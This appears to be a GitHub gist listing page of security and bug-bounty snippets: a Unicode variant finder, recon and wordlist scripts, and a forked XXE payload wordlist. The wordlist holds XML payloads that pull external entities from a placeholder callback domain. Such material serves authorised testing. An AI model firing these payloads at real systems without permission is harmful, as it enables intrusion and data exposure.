| Security Issue | Trigger |
|---|
devanshbatham
/ unicode-fun.js
Created
February 27, 2025 18:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function findUnicodeVariants(input) { | |
| const results = []; | |
| const inputLower = input.toLowerCase(); | |
| const inputUpper = input.toUpperCase(); | |
| const startSubstrLower = inputLower.slice(0, 2); // First 2 chars for substring check | |
| const startSubstrUpper = inputUpper.slice(0, 2); | |
| // Function to test a full-string variant | |
| function testFullVariant(original, variant, pos, unicodeChar, codePoint) { | |
| const upper = variant.toUpperCase(); |
devanshbatham
/ GitHub-Actions-Attack-Vectors.md
Last active
March 15, 2025 21:41
GitHub Actions Attack Vectors
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :set number | |
| :set autoindent | |
| :set tabstop=4 | |
| :set ts=4 | |
| :set shiftwidth=4 | |
| :set smarttab | |
| :set softtabstop=4 | |
| :set mouse=a | |
| :set encoding=UTF-8 | |
| :set autoindent |
devanshbatham
/ sslextract.py
Created
November 9, 2020 10:57
sslExtract : Extract DNS records from IP addresses
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from multiprocessing.pool import ThreadPool | |
| from time import time as timer | |
| from urllib.request import urlopen | |
| import sys | |
| import re | |
| import os.path | |
| start = timer() |
devanshbatham
/ xxe-payloads.txt
Created
September 14, 2020 11:14
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
devanshbatham
/ wordlist-gen.sh
Created
August 12, 2020 16:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gau $1 | unfurl -u paths | tee $1.txt; | |
| sed 's#/#\n#g' $1.txt | sort -u | tee temp.txt; | |
| cat temp.txt | grep -Ev '\.' | tee paths-$1.txt; | |
| cat temp.txt | grep -v '(png|jpg|css|gif|woff|pdf)' | tee relevant-files.txt; | |
| cat relevant-files.txt | grep '\.' | tee files-$1.txt; | |
| rm temp.txt; | |
| rm relevant-files.txt; | |
| rm $1.txt; |
devanshbatham
/ com.py
Created
June 4, 2020 06:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| scope = sys.argv[1] | |
| wordlist = open('/home/levi/Desktop/Warzone/Base/tools/wordlists/commonspeak.txt').read().split('\n') | |
| for word in wordlist: | |
| if not word.strip(): | |
| continue | |
| print('{}.{}'.format(word.strip(), scope)) |